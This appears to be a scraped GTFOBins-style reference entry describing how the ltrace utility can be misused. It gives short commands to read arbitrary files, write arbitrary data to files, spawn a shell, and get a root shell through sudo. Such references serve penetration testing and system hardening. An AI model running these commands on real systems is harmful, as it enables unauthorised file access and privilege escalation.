| description |
code |
| The file is parsed as a configuration file and its content is shown as error messages, thus this is not suitable to exfiltrate binary files. |
LFILE=file_to_read
ltrace -F $LFILE /dev/null
|
|
|
| description |
code |
| The data to be written appears amid the library function call log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough. More generally, any binary that executes whatever library function call passing arbitrary data can be used in place of `ltrace -F DATA`. |
LFILE=file_to_write
ltrace -s 999 -o $LFILE ltrace -F DATA
|
|
|
| code |
| ltrace -b -L /bin/sh |
|
|
| code |
| sudo ltrace -b -L /bin/sh |
|
|
